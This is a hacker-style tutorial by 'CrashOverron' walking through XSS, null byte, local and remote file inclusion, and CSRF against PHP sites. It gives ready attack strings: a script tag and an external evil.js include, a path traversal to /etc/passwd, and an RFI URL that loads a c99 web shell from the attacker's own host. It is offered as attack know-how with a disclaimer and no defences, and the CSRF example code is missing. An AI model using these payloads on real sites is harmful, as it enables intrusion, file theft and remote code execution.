/=================
| Table of Contents |
=================/
1. Intro
2. XSS
3. Null Byte
4. LFI
5. RFI
6. CSRF
7.Conclusion
-========-
| 1. INTRO |
-========-
Hey, I'm CrashOverron and this article has been written in order for people to come
to one location and learn about a few of the most common internet exploits out there.
Ok, lets start off with the usual stuff; neither myself nor this site are
responsible for your actions after reading this article blah blah blah.
========
+ 2. XSS +
========
XSS stands for Cross-site scripting. During a XSS hack typically a page is sent a script
by the attacker; common tags used for such an attack may include:
SCRIPT, OBJECT APPLET, EMBED, and FORM
Typically the attacker will use internet scripting languages such as
Javascript, VBScript, HTML, Perl, or ActiveX.
examples:
<script>document.write("h4x0rd by CrashOverron");</script>
<img src=http://www.somesite.com/evil.js" />
==============
+ 3. Null Byte +
==============
The NULL character is nothing more than...a value of zero. In Null Byte attacks the null
character is often represented by \0 or %00. The null character, I believe, forces the code
to automatically exit leaving us with the source.
http://www.somesite.com/index.php?page=admin%00on a vulnerable page this would result in us viewing the source of the admin page, it being
PHP, CGI, etc
========
+ 4. LFI +
========
LFI is an acronym for Local File Inclsion. Often hosts save their password files on their server
online in a directory just a linux does in the /etc/passwd directory. Once you have this file, you
simply take it and crack the password or whatever you need to do with it. In order to get to the
file you must go back several directories first. LFI exploits are much like RFI, in the aspect that
both include a page in the PHP, so the code could look something roughly like
<?php
include("
http://www.somesite.com/" . $_GET['page']);
?>
which then your LFI attack could look like this
http://www.somesite.com/index.php?page=../../../../../../../etc/passwdthen you have the password file; which is typically useless unless you get the shadow file, which wont be available
but this would open a window for multiple things.
========
+ 5. RFI +
========
RFI, similar to LFI, stands for Remote File Inclusion. For an RFI attack you will need a remote file
hosted somewhere, such as a c99 script hosted on your website. Often, if you save your PHP as .txt,
the page will often still interpret the code and execute the commands. So the source code for an
exploitable site may look similar to this
<?php
include($_GET['page'] . '.php');
?>
which then we would be able to execute our c99 code like this
http://www.somesite.com/index.php?page=http://mysite.com/c99.txt?the ? after my malicious page is in case they have anything following the page such as in the example,
I have .php following the page, everything gets turned into a perameter which will not get executed
=========
+ 6. CSRF +
=========
CSRF stands for Cross Site Request Forgery. IMO CSRF is a hybrid exploit made between XSS
and phishing. In CSRF you are trying to force a user to view something without knowing it; for example,
as KillGuppy uses in his CSRF video, changing the admin's password without them even knowing it, by
simply viewing your avatar. Your avatar code could look something like this
if this was set as your avatar or sig then everyone that viewed it would change their password, unknowingly,
to "h4x0rd". There are other ways to implement CSRF attacks, but this is one of the most basic.
-==============-
| 7. Conclusion |
-==============-
Thank you for reading this article, I hope it helped you learn alteast something that you didn't already know
or helped you understand something a little bit better. I may write an article soon on how to secure your site
from a few of these attacks or possibly get one of my teammates to write it.
Peace,
CrashOverron
